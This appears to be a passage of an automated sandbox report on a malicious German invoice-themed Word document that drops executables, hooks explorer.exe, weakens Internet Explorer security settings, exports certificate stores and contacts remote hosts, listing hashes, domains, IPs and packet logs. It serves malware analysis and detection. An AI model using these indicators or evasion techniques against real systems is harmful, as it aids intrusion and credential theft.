Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_0_0040D75C SetUnhandledExceptionFilter,MapAndLoad,IsBadStringPtrW,6_0_0040D75C
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_0_0042533A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_0_0042533A
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_0_004139E2 SetUnhandledExceptionFilter,DialogBoxParamW,CreateFileMappingW,6_0_004139E2
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_0_0041107F UnmapViewOfFile,SetUnhandledExceptionFilter,RegUnLoadKeyA,6_0_0041107F
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_0_00425415 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_0_00425415
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_0_00416AF4 GetPrinterDriverW,SetUnhandledExceptionFilter,StartDocW,6_0_00416AF4
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_1_0042533A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_0042533A
Contains functionality to dynamically determine API calls
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_0040236E LoadLibraryA,LoadLibraryA,GetProcAddress,4_2_0040236E
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_004053BF VirtualFree,GetProcessHeap,HeapFree,4_2_004053BF
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEMemory protected: page read and write and page guard
Looks for software installed on the system
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comRegistry key enumerated: More than 213 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Virtual Machine Detection:

Contains functionality to enumerate / list files inside a directory
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_2_0041DD7A FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,5_2_0041DD7A
Contains functionality to query system information
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_00404644 GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,lstrlenA,GetModuleHandleA,GetProcAddress,GetSystemInfo,4_2_00404644
Queries a list of all running processes
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeProcess information queried: ProcessInformation

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com Process information set: NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\cmd.exe Process information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Code function: 5_2_00417B9E LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,5_2_00417B9E
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Registry key monitored for changes: \REGISTRY\USER
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: GetFileAttributesExW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: GetUpdateRect new code: 0xE9 0x90 0x0A 0xAA 0xA0 0x0A
Overwrites code with function prologues

Lowering of HIPS / PFW / Operating System Security Settings:

May initialize a security null descriptor
Source: 3463226.exe Binary or memory string: S:(ML;;NRNWNX;;;LW)
Disables the phishing filter of internet explorer 8
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8
Modifies Internet Explorer zone settings
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1406
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1406
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 1609
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1609
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1609
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1A02
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1A10
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1A10
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1A03
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1A05
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1A05
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1A05
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe Registry key created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 1A06

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Code function: 5_2_00420A6C CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,5_2_00420A6C
Contains functionality to query the account / user name
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com Code function: 4_2_00404A95 OleInitialize,OleInitialize,GetUserNameA,GetUserNameA,4_2_00404A95
Contains functionality to query time zone information
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Code function: 5_2_0041826D GetTimeZoneInformation,5_2_0041826D
Contains functionality to query windows version
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com Code function: 4_2_00404644 GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,lstrlenA,GetModuleHandleA,GetProcAddress,GetSystemInfo,4_2_00404644
Queries the cryptographic machine GUID
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of Windows
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Queries the installation date of Windows
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the product ID of Windows
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Queries volume information: C:\Rechnung_05052014.doc VolumeInformation
Source: C:\WINDOWS\system32\svchost.exe Queries volume information: C:\WINDOWS\wiaservc.log VolumeInformation
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Queries volume information: C:\ VolumeInformation
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe Queries volume information: C:\ VolumeInformation
Source: C:\WINDOWS\system32\cmd.exe Queries volume information: C:\ VolumeInformation
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Code function: 5_1_00419B00 GetLocalTime followed by cmp: cmp dword ptr [ebp-0000066ch], 17h and CTI: je 00419B9Ah 5_1_00419B00
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe Code function: 5_0_00419B00 GetLocalTime followed by cmp: cmp dword ptr [ebp-0000066ch], 17h and CTI: je 00419B9Ah 5_0_00419B00
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe Code function: 6_1_00419B00 GetLocalTime followed by cmp: cmp dword ptr [ebp-0000066ch], 17h and CTI: je 00419B9Ah 6_1_00419B00
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe Code function: 6_0_00419B00 GetLocalTime followed by cmp: cmp dword ptr [ebp-0000066ch], 17h and CTI: je 00419B9Ah 6_0_00419B00

Yara Overview

No Yara matches

Startup

  • system is xp2
  • WINWORD.EXE (PID: 216 MD5: 5FEAF6AB43AA477597F9F8DB0E8CB69C)
    • ZwGuKEMphiZgNT.com (PID: 1640 MD5: 2728887EBB406A0FCE1BF901B2B23418)
      • 3463226.exe (PID: 1652 MD5: 33E9C84EB21E020B0011915D010D3B08)
        • gonuu.exe (PID: 212 MD5: AF1EAE6571501D509A0F1FB43328C405)
          • explorer.exe (PID: 1496 MD5: 12896823FB95BFB3DC9B46BCAEDC9923)
          • ctfmon.exe (PID: 1756 MD5: 5F1D5F88303D4A4DBC8E5F97BA967CC3)
          • wscntfy.exe (PID: 1796 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)
        • cmd.exe (PID: 756 cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp17a7aa60.bat MD5: 6D778E0F95447E6546553EEEA709D03C)
  • svchost.exe (PID: 1252 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
  • cleanup

Created / dropped Files

File Path / Type and Hashes
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe
  • Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
  • MD5: 33E9C84EB21E020B0011915D010D3B08
  • SHA: 9380FAF859117536E564B1568F219276756AD8A6
  • SHA-256: 01B76143E2EB618B078C0DC7CB1AF66E9CC7E9CDA7F92DC34D5DFD1201F2E792
  • SHA-512: 26ADC413498B0A804BE6907F85BCD35D4627F3217460D637E2F0C045AA4DABA6A30D34E1150ED188DA2A345DB0C2A4E5737C40DC1407684C33C09EB0DDE14D6A
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\MPS1.tmp
  • Type: data
  • MD5: BAFD2362E5F623037C405EB88F93576A
  • SHA: 9A39F86CF79DF08F46B2759E9F68FC8D0AA5FE0D
  • SHA-256: 05107771C473109A2C16C834245217C35D074A1976CE86A299812D866369C1EA
  • SHA-512: B50A1122EA995C118F16FEC64A0D1869DB4EA1E686B1B24441D45E926537DAC56FC31A0FA9E450DACD4ACE1A0F36C619F15B69AF896D86B2FC6D90EC835A5AC0
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Word8.0\MSForms.exd
  • Type: data
  • MD5: 61B548DA17248B5086616C6D1769B59F
  • SHA: F2816A1E599DAD47FC5F11260E66392817031F85
  • SHA-256: 6533D39A8A6C1E70604188DF69FB92A9DE9F2C871CDDD2822468D9DE841113ED
  • SHA-512: 28E42D2E4368322DD60A1F421887533985B2EC3BC1F2FDF8C0BE930E9C23741CD1BADBBFABD064CD83D7F4BC37026EC2926E6DC16270DD29B2F3169CFD46A5EC
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp17a7aa60.bat
  • Type: DOS batch file text
  • MD5: 243E44DFA911ECC81190352DBBDBF972
  • SHA: D0EF81A37A0D674C9EF3039536575D0934C75C10
  • SHA-256: 6C835F7CDDF6E9CE1FF3407792B9E961AFDEA06063D643A59BB8285331ACB516
  • SHA-512: B31C4327157BB1FD17574618E6A0D6002EA3B74263A47E850C8D1C72F829018906FD65D393960D21F360295CEF9EF94669B1FA7072677BAD312033BEC8B18424
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~WRD0001.doc
  • Type: DOS executable (device driver)
  • MD5: D08FB2328DD32683D34ECFD4FBC1D992
  • SHA: 02388633088D0988AA6860884F0143E699F64FC1
  • SHA-256: B1A172ABE8DD9C7E26664B37F7153335EE0D386F4AC09CA6DFC2938CED0FC464
  • SHA-512: 538A5EBAACC97BCD73294CC4E046577995C22CD7A627BF5DD79C0C84B00399630A79D1C140EB6D816F5C3DA0F55F9F2A70E187C937388ED4D561F2851B1CF8E9
C:\DOCUME~1\ALLUSE~1\APPLIC~1\MICROS~1\OFFICE\DATA\opa11.dat
  • Type: DBase 3 data file (1761531074 records)
  • MD5: 374016627E06A3871B86049B58D69058
  • SHA: 12E724CBDF4B7A5E770125E86B654E5A432D17BB
  • SHA-256: FEE83CB65F2BFB59E63AAC9FED294ABEDC827A729E3D7C01B66E1C5CCAA6922B
  • SHA-512: 7D98B40A600B99F929067A4A59075E7FC6A10E8A8EFC7B7CB8A28277994EA70224FA2BAC84114E42F6F78E6AF98E26F1BF2C90A1EF06441BB4971DF6ACC513E4
C:\Documents and Settings\Administrator\Application Data\Microsoft\Address Book\Administrator.wab
  • Type: data
  • MD5: DBA332182A6678C1360B5A5FB63B5760
  • SHA: 5FF5B208A2A2CA9826E59860B9864719B8E542EA
  • SHA-256: A02CDC581424E8090AC13DBCB8F01390587C3E49CF805F9B05FEDA6AD22F91DD
  • SHA-512: 57B42351875F4983A1AA026EBDEB98984C73785DC4CAA02B443A328BCA23490C47BADE6AABF119D4F7841995CB9A981892B8A2D599B54801AF2C58DB486B1471
C:\Documents and Settings\Administrator\Application Data\Microsoft\Address Book\Administrator.wab~
  • Type: data
  • MD5: 7AD248859B84C9A65099A9458C814975
  • SHA: 9FF26648AE19F209FF23FA538C9CCE9706F921D5
  • SHA-256: AB4E8136B4E6F2335CC8FFE292BC44DDFB023A259E2B5B8BD3A54A14A9F6C864
  • SHA-512: 0DF30D09C59AD4795A1A55D05E4948DF5EE638C612B63E3D3B3D9FD97328AE4AEE8DCDB3BDFF87D3C455C293A98CD7887AD287F89F46D217321C9CD83D92DFE4
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\MSO1033.acl
  • Type: data
  • MD5: 67EF35E2D404B22A3C89F07AEDA3CB47
  • SHA: A9139883179A14E27B2B62043456894BCA3EFFF5
  • SHA-256: 07D26A6F23B739E3F2F984B6F391EFEAF7D62CB90002793234D0FC0AFBA54490
  • SHA-512: 7FDDD2D0FEBD5117EA851B58B2D64E0E0194053F71574A8B36FBCB346B7EA53B1FBE7434AFBE6B810BBC70911FACFA348F6F6D052B8BFA0A4F7193CB3839236B
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\Local Disk (C).LNK
  • Type: MS Windows shortcut
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\Rechnung_05052014.doc.LNK
  • Type: MS Windows shortcut
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\index.dat
  • Type: ASCII text, with CRLF line terminators
C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe
  • Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO\567EFA22.wmf
  • Type: ms-windows metafont .wmf
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO\696E3FBB.wmf
  • Type: ms-windows metafont .wmf
C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
  • Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
C:\WINDOWS\wiadebug.log
  • Type: ASCII text, with CRLF line terminators
C:\WINDOWS\wiaservc.log
  • Type: ASCII text, with CRLF line terminators
C:\~$chnung_05052014.doc
  • Type: data
\net\NtControlPipe12
  • Type: data
\srvsvc
  • Type: GLS_BINARY_LSB_FIRST

Contacted Domains/Contacted IPs

Contacted Domains

Name                 IP              Name Server  Active  Registrar  e-Mail
www.pensionmagda.cz  217.198.114.63  unknown      true    unknown    unknown
pensionmagda.cz      217.198.114.63  unknown      true    unknown    unknown
pianossimi.fr        213.186.33.87   unknown      true    unknown    unknown

Contacted IPs

IP              Country         Pingable  Open Ports
213.186.33.87   France          unknown   unknown
217.198.114.63  Czech Republic  unknown   unknown
195.186.1.121   Switzerland     unknown   unknown

Static File Info

General

File type:CDF V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: shad, Template: Normal.dotm, Last Saved By: User, Revision Number: 87, Name of Creating Application: Microsoft Office Word, Total Editing Time: 20:09:00, Create Time/Date: Fri May 16 23:41:00 2014, Last Saved Time/Date: Sun Jun 01 23:27:00 2014, Number of Pages: 38, Number of Words: 30978, Number of Characters: 176580, Security: 0
File name:Rechnung_05052014.doc
File size:428032
MD5:b9f33467d0856e18129aca8f997eeaf8
SHA1:05bd0fadcfabd200d90095d2306a7cdd48c32066
SHA256:6ccf3cc6ccc348c7451a35045f93a49b34c77cce62b0f465ef3d8782eac72c3c
SHA512:fac4e9a416ba2d2a19dd8748857f0a2f86b21aaf136ac99f6f95facfa314ac106d9f68e23398054923f244e8798840d5e104d2ceb55007d40a07bb82a6164738

Network Behavior

TCP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
Aug 8, 2014 11:26:07.477576971 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477608919 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.477638006 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.477655888 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477659941 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477663994 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477665901 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477746964 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.477752924 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477783918 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.477823019 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477833033 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477835894 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477899075 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.477905035 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.477936029 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478020906 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478038073 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478041887 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478044033 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478056908 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478142023 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478169918 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478173971 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478240013 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478244066 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478256941 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478334904 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478339911 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478378057 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478446960 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478450060 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478463888 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478466034 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478557110 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478562117 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478600025 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478643894 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478647947 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478652000 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478653908 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478717089 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478723049 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478751898 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478779078 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478835106 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478890896 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478894949 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478898048 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478900909 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478903055 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.478982925 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.478988886 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479017973 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479043961 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479043961 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479048967 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479162931 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479168892 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479243994 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479262114 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479265928 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479268074 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479270935 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479274035 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479350090 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479378939 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479382992 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479456902 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479638100 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479644060 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479649067 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479650974 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479654074 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479655981 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479657888 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479660988 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479661942 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479779005 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479804993 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479813099 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479816914 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479830027 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479832888 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479835987 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.479875088 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479903936 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.479907990 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:07.480051041 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.480078936 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.480103970 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.484464884 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:07.487037897 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.477035999 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477045059 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477049112 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477155924 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.477201939 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.477287054 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477293015 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477298021 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477303028 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477305889 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477426052 MESZ103280192.168.1.13213.186.33.87
Aug 8, 2014 11:26:08.477452040 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477458000 MESZ801032213.186.33.87192.168.1.13
Aug 8, 2014 11:26:08.477461100 MESZ801032213.186.33.87192.168.1.13
